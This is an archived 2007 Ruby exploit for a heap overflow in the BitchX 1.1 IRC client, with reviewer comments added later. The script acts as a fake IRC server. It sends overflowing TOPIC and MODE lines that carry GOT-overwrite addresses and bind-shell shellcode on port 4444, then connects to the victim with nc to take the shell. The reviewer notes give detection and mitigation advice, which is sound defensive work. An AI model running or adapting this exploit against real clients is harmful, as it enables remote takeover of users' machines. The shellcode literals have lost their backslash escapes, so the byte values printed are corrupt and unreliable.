# Title : BitchX 1.1 Final MODE Remote Heap Overflow Exploit (0-day)
# Published : 2007-08-27
# Author : bannedit
#!/usr/bin/env ruby
######################################################
# BitchX-1.1 Final MODE Heap Overflow [0-day]
# By bannedit
# Discovered May 16th 2007
# - Yet another overflow which can overwrite GOT
#
# I found this vuln after modifying ilja's ircfuzz
# code. Currently this exploit attempts to
# overwrite the GOT with the ret address to the
# shellcode.
#
# The actual vulnerability appears to be a stack
# overflow in p_mode. Due to input size restrictions
# the overflow can't occur on the stack because we can
# only overflow so much data. Luckily though we
# overwrite a structure containing pointers to heap
# data. This allows us to overwrite the GOT.
#
# Reliability of this exploit in its current stage is
# limited. There appear to be several factors which
# restrict the reliability.
#######################################################
# Reviewer notes (defensive reading of a 2007 listing, not a runnable tool):
# - The script acts as a fake IRC server: it listens on a TCP port, replies to
#   any connecting client with a scripted registration burst, then sends long
#   TOPIC and MODE lines built from a repeated 4-byte value, a 0x90 filler and
#   a bind-shell payload, and finally forks `nc` toward the peer on port 4444.
# - Detection angle: server->client IRC traffic whose TOPIC/MODE lines carry
#   hundreds of repetitions of one 4-byte word followed by a long 0x90 run,
#   and a client host that starts listening on TCP/4444 shortly after.
# - Mitigation: the target is the BitchX 1.1 final client; a client that is
#   still at this version should not be pointed at untrusted IRC servers.
# - NOTE(review): as printed, literals such as "x90" and "rn" contain no
#   backslash escapes, so the byte values shown here are not authoritative
#   (the listing appears to have lost characters in extraction). Do not derive
#   byte-level indicators from this text without confirming against a sample.
require 'socket'
#the linux 2.6 target most effective atm
# Per-target address table (hex strings); only one entry is used below.
targets = { 'linux 2.6' => '0x81861c8', 'linux 2.6 Hardened (FC6)' =>
'0x8154d70','freebsd' => '0x41414141' }
shellcode = #fork before binding a shell provides a clean exit
"x6ax02x58xcdx80x85xc0x74x05x6ax01x58xcdx80"+
#metasploit linux x86 shellcode bind tcp port 4444
"x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13xfc"+
"x98xd8xb8x83xebxfcxe2xf4xcdx43x8bxfbxafxf2xdaxd2"+
"x9axc0x41x31x1dx55x58x2exbfxcaxbexd0xedxc4xbexeb"+
"x75x79xb2xdexa4xc8x89xeex75x79x15x38x4cxfex09x5b"+
"x31x18x8axeaxaaxdbx51x59x4cxfex15x38x6fxf2xdaxe1"+
"x4cxa7x15x38xb5xe1x21x08xf7xcaxb0x97xd3xebxb0xd0"+
"xd3xfaxb1xd6x75x7bx8axebx75x79x15x38"
# Listening port: first CLI argument, default 6667 (the usual IRC port).
port = (ARGV[0] || 6667).to_i
sock = TCPServer.new('0.0.0.0', port)
# NOTE(review): the comment on the targets table names 'linux 2.6' as the
# most effective entry, but this lookup hardcodes the FC6 entry instead.
ret = (targets['linux 2.6 Hardened (FC6)'].hex)
puts "----------------------------------------------"
puts "- BitchX-1.1 Final Mode Heap Buffer Overflow -"
puts "- By bannedit -"
puts "----------------------------------------------"
puts "n[-] listening for incoming clients..."
# Each accepted client gets the full scripted sequence; the loop never exits
# on its own, so the fake server keeps serving further connections.
while (client = sock.accept)
# Socket#peeraddr => [family, port, host, ip]; ip[3] is used for the nc call.
ip = client.peeraddr
# Reads one line from the client (its first registration line) and echoes it.
buffer = client.gets
puts "[<] #{buffer}"
# 13 copies of the little-endian 4-byte value; reused as the fake hostname.
hostname = ([ret].pack('V')) * 13
nick = "bannedit"
#Fake server reply to connection
# Scripted replies mimicking server numerics 001-005, 251-255 and the MOTD
# block (375/372/376), so the client believes registration succeeded.
buffer = ":#{nick} MODE #{nick} :+iwrn"+
":0 001 #{nick} :biznitch-1.0rn"+
":5 002 #{nick} :biznitch-1.0rn"+
":6 003 #{nick} :arn"+
":aaa 004 #{nick} :arn"+
":aaa 005 #{nick} :arn"+
":aaa 251 #{nick} :arn"+
":aaa 252 #{nick} :arn"+
":aaa 253 #{nick} :arn"+
":aaa 254 #{nick} :arn"+
":aaa 255 #{nick} :arn"+
":aaa 375 #{nick} :arn"+
":aaa 372 #{nick} :arn"+
":aaa 376 #{nick} :arn"
# Built but never sent: the send on the `join` line below is commented out.
join = ":aaa 302 #{nick} :#{nick}=+#{nick}@#{nick}rn"+
":#{nick}!#{nick}@#{hostname * 4} JOIN :#hackersrn"
puts "[>] sending fake server response"
client.send(buffer, 0)
sleep(2)
# client.send(join, 0)
# TOPIC line: 100 copies of the (now offset) 4-byte value, sent 21 times.
topic = ":aaa TOPIC #hackers:"
ret = ret + 0x200
topic<< ([ret].pack('V')) * 100
topic<< "rn"
for i in 0..20
client.send(topic, 0)
end
puts "[>] sending evil buffer"
# MODE line: the repeated value (200 copies), a 0x90 filler sized so that the
# filler plus payload totals 1126 bytes, the payload, 40 more filler bytes.
# Sent 6 times.
evilbuf = ":#{hostname} MODE "
evilbuf<< "#{nick} :aaa"
ret = ret + 0x200
evilbuf<< ([ret].pack('V')) * 200
evilbuf<< "x90" * (1126 - shellcode.length)
evilbuf<< shellcode
evilbuf<< "x90" * 40
evilbuf<< "rn"
for i in 0..5
client.send(evilbuf, 0)
end
sleep(10) #wait for the shellcode to do its thing...
puts "[+] exploit completed if successful port 4444 should be open"
puts "[+] connecting to #{ip[3]} on port 4444 and dropping shell...nn"
# Child process runs nc against the peer address via the shell; the parent
# returns to sock.accept. The peer address is interpolated unquoted.
fork {
system("nc #{ip[3]} 4444")
puts "[+] exiting shell dropping back to listener"
}
end